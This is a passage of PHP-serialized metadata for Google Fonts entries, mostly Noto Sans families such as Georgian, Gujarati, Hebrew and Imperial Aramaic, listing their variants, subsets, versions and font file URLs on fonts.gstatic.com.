Display\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-06-01\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:126:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_3cLVTGQ2iHrvWM.ttf\";s:3:\"200\";s:126:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp__cKVTGQ2iHrvWM.ttf\";s:3:\"300\";s:126:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_ykKVTGQ2iHrvWM.ttf\";s:7:\"regular\";s:126:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_3cKVTGQ2iHrvWM.ttf\";s:3:\"500\";s:126:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_0UKVTGQ2iHrvWM.ttf\";s:3:\"600\";s:126:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_6kNVTGQ2iHrvWM.ttf\";s:3:\"700\";s:126:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_5ANVTGQ2iHrvWM.ttf\";s:3:\"800\";s:126:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp__cNVTGQ2iHrvWM.ttf\";s:3:\"900\";s:126:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_94NVTGQ2iHrvWM.ttf\";s:9:\"100italic\";s:129:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JvXOa3gPurWM9uQ.ttf\";s:9:\"200italic\";s:129:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JPXKa3gPurWM9uQ.ttf\";s:9:\"300italic\";s:129:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9J43Ka3gPurWM9uQ.ttf\";s:6:\"italic\";s:129:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JvXKa3gPurWM9uQ.ttf\";s:9:\"500italic\";s:129:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9Jj3Ka3gPurWM9uQ.ttf\";s:9:\"600italic\";s:129:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JY3Wa3gPurWM9uQ.ttf\";s:9:\"700italic\";s:129:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JWnWa3gPurWM9uQ.ttf\";s:9:\"800italic\";s:129:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JPXWa3gPurWM9uQ.ttf\";s:9:\"900italic\";s:129:\"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JFHWa3gPurWM9uQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:858;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Duployan\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:8:\"duployan\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/notosansduployan/v16/gokzH7nwAEdtF9N8-mdTDx_X9JM5wsvrFsIn6WYDvA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:859;O:8:\"stdClass\":8:{s:6:\"family\";s:30:\"Noto Sans Egyptian Hieroglyphs\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:20:\"egyptian-hieroglyphs\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:121:\"http://fonts.gstatic.com/s/notosansegyptianhieroglyphs/v26/vEF42-tODB8RrNDvZSUmRhcQHzx1s7y_F9-j3qSzEcbEYindSVK8xRg7iw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:860;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Elbasan\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"elbasan\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosanselbasan/v15/-F6rfiZqLzI2JPCgQBnw400qp1trvHdlre4dFcFh.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:861;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Elymaic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"elymaic\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosanselymaic/v15/UqyKK9YTJW5liNMhTMqe9vUFP65ZD4AjWOT0zi2V.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:862;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Georgian\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:8:\"georgian\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v36\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:128:\"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdpvnzVj-f5WK0OQV.ttf\";s:3:\"200\";s:128:\"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdptnzFj-f5WK0OQV.ttf\";s:3:\"300\";s:128:\"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdpu5zFj-f5WK0OQV.ttf\";s:7:\"regular\";s:128:\"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdpvnzFj-f5WK0OQV.ttf\";s:3:\"500\";s:128:\"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdpvVzFj-f5WK0OQV.ttf\";s:3:\"600\";s:128:\"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdps5y1j-f5WK0OQV.ttf\";s:3:\"700\";s:128:\"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdpsAy1j-f5WK0OQV.ttf\";s:3:\"800\";s:128:\"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdptny1j-f5WK0OQV.ttf\";s:3:\"900\";s:128:\"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdptOy1j-f5WK0OQV.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:863;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Noto Sans Glagolitic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:10:\"glagolitic\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/notosansglagolitic/v15/1q2ZY4-BBFBst88SU_tOj4J-4yuNF_HI4ERK4Amu7nM1.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:864;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Gothic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"gothic\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosansgothic/v15/TuGKUUVzXI5FBtUq5a8bj6wRbzxTFMX40kFQRx0.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:865;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Grantha\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"grantha\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosansgrantha/v15/3y976akwcCjmsU8NDyrKo3IQfQ4o-r8cFeulHc6N.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:866;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Gujarati\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gujarati\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:128:\"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_ypFgPM_OdiEH0s.ttf\";s:3:\"200\";s:128:\"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_wpFwPM_OdiEH0s.ttf\";s:3:\"300\";s:128:\"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_z3FwPM_OdiEH0s.ttf\";s:7:\"regular\";s:128:\"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_ypFwPM_OdiEH0s.ttf\";s:3:\"500\";s:128:\"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_ybFwPM_OdiEH0s.ttf\";s:3:\"600\";s:128:\"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_x3EAPM_OdiEH0s.ttf\";s:3:\"700\";s:128:\"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_xOEAPM_OdiEH0s.ttf\";s:3:\"800\";s:128:\"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_wpEAPM_OdiEH0s.ttf\";s:3:\"900\";s:128:\"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_wAEAPM_OdiEH0s.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:867;O:8:\"stdClass\":8:{s:6:\"family\";s:23:\"Noto Sans Gunjala Gondi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:13:\"gunjala-gondi\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/notosansgunjalagondi/v15/bWto7e7KfBziStx7lIzKPrcSMwcEnCv6DW7n5hcVXYMTK4q1.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:868;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Gurmukhi\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:8:\"gurmukhi\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:128:\"http://fonts.gstatic.com/s/notosansgurmukhi/v18/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG1Oe3bxZ_trdp7h.ttf\";s:3:\"200\";s:128:\"http://fonts.gstatic.com/s/notosansgurmukhi/v18/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG3OenbxZ_trdp7h.ttf\";s:3:\"300\";s:128:\"http://fonts.gstatic.com/s/notosansgurmukhi/v18/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG0QenbxZ_trdp7h.ttf\";s:7:\"regular\";s:128:\"http://fonts.gstatic.com/s/notosansgurmukhi/v18/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG1OenbxZ_trdp7h.ttf\";s:3:\"500\";s:128:\"http://fonts.gstatic.com/s/notosansgurmukhi/v18/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG18enbxZ_trdp7h.ttf\";s:3:\"600\";s:128:\"http://fonts.gstatic.com/s/notosansgurmukhi/v18/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG2QfXbxZ_trdp7h.ttf\";s:3:\"700\";s:128:\"http://fonts.gstatic.com/s/notosansgurmukhi/v18/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG2pfXbxZ_trdp7h.ttf\";s:3:\"800\";s:128:\"http://fonts.gstatic.com/s/notosansgurmukhi/v18/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG3OfXbxZ_trdp7h.ttf\";s:3:\"900\";s:128:\"http://fonts.gstatic.com/s/notosansgurmukhi/v18/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG3nfXbxZ_trdp7h.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:869;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Noto Sans HK\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"700\";i:5;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:16:\"chinese-hongkong\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"100\";s:82:\"http://fonts.gstatic.com/s/notosanshk/v21/nKKO-GM_FYFRJvXzVXaAPe9ZUHp1MOv2ObB7.otf\";s:3:\"300\";s:84:\"http://fonts.gstatic.com/s/notosanshk/v21/nKKP-GM_FYFRJvXzVXaAPe9ZmFhTHMX6MKliqQ.otf\";s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/notosanshk/v21/nKKQ-GM_FYFRJvXzVXaAPe9hMnB3Eu7mOQ.otf\";s:3:\"500\";s:84:\"http://fonts.gstatic.com/s/notosanshk/v21/nKKP-GM_FYFRJvXzVXaAPe9ZwFlTHMX6MKliqQ.otf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/notosanshk/v21/nKKP-GM_FYFRJvXzVXaAPe9ZiF9THMX6MKliqQ.otf\";s:3:\"900\";s:84:\"http://fonts.gstatic.com/s/notosanshk/v21/nKKP-GM_FYFRJvXzVXaAPe9ZsF1THMX6MKliqQ.otf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:870;O:8:\"stdClass\":8:{s:6:\"family\";s:25:\"Noto Sans Hanifi Rohingya\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:15:\"hanifi-rohingya\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-06-01\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:126:\"http://fonts.gstatic.com/s/notosanshanifirohingya/v18/5h17iYsoOmIC3Yu3MDXLDw3UZCgghyOEBBY7hhLNyo3tiaiuSIAqrIYY4j6vvcudK8rN.ttf\";s:3:\"500\";s:126:\"http://fonts.gstatic.com/s/notosanshanifirohingya/v18/5h17iYsoOmIC3Yu3MDXLDw3UZCgghyOEBBY7hhLNyo3tiaiuSIAqrIYq4j6vvcudK8rN.ttf\";s:3:\"600\";s:126:\"http://fonts.gstatic.com/s/notosanshanifirohingya/v18/5h17iYsoOmIC3Yu3MDXLDw3UZCgghyOEBBY7hhLNyo3tiaiuSIAqrIbG5T6vvcudK8rN.ttf\";s:3:\"700\";s:126:\"http://fonts.gstatic.com/s/notosanshanifirohingya/v18/5h17iYsoOmIC3Yu3MDXLDw3UZCgghyOEBBY7hhLNyo3tiaiuSIAqrIb_5T6vvcudK8rN.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:871;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Hanunoo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"hanunoo\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosanshanunoo/v15/f0Xs0fCv8dxkDWlZSoXOj6CphMloFsEsEpgL_ix2.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:872;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Hatran\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"hatran\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosanshatran/v15/A2BBn4Ne0RgnVF3Lnko-0sOBIfL_mM83r1nwzDs.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:873;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Hebrew\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v38\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:124:\"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiXd4utoiJltutR2g.ttf\";s:3:\"200\";s:124:\"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiX94qtoiJltutR2g.ttf\";s:3:\"300\";s:124:\"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiXKYqtoiJltutR2g.ttf\";s:7:\"regular\";s:124:\"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiXd4qtoiJltutR2g.ttf\";s:3:\"500\";s:124:\"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiXRYqtoiJltutR2g.ttf\";s:3:\"600\";s:124:\"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiXqY2toiJltutR2g.ttf\";s:3:\"700\";s:124:\"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiXkI2toiJltutR2g.ttf\";s:3:\"800\";s:124:\"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiX942toiJltutR2g.ttf\";s:3:\"900\";s:124:\"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiX3o2toiJltutR2g.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:874;O:8:\"stdClass\":8:{s:6:\"family\";s:26:\"Noto Sans Imperial Aramaic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:16:\"imperial-aramaic\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:111:\"http://fonts.gstatic.com/s/notosansimperialaramaic/v15/a8IMNpjwKmHXpgXbMIsbTc_kvks91LlLetBr5itQrtdml3YfPNno.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:875;O:8:\"stdClass\":8:{s:6:\"family\";s:29:\"Noto Sans Indic Siyaq Numbers\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:19:\"indic-siyaq-numbers\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:117:\"http://fonts.gstatic.com/s/notosansindicsiyaqnumbers/v15/6xK5dTJFKcWIu4bpRBjRZRpsIYHabOeZ8UZLubTzpXNHKx2WPOpVd5Iu.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:876;O:8:\"stdClass\":8:{s:6:\"family\";s:31:\"Noto Sans Inscriptional Pahlavi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:21:\"inscriptional-pahlavi\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:123:\"http://fonts.gstatic.com/s/notosansinscriptionalpahlavi/v15/ll8UK3GaVDuxR-TEqFPIbsR79Xxz9WEKbwsjpz7VklYlC7FCVtqVOAYK0QA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:877;O:8:\"stdClass\":8:{s:6:\"family\";s:32:\"Noto Sans Inscriptional Parthian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:22:\"inscriptional-parthian\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:125:\"http://fonts.gstatic.com/s/notosansinscriptionalparthian/v15/k3k7o-IMPvpLmixcA63oYi-yStDkgXuXncL7dzfW3P4TAJ2yklBJ2jNkLlLr.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:878;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Noto Sans 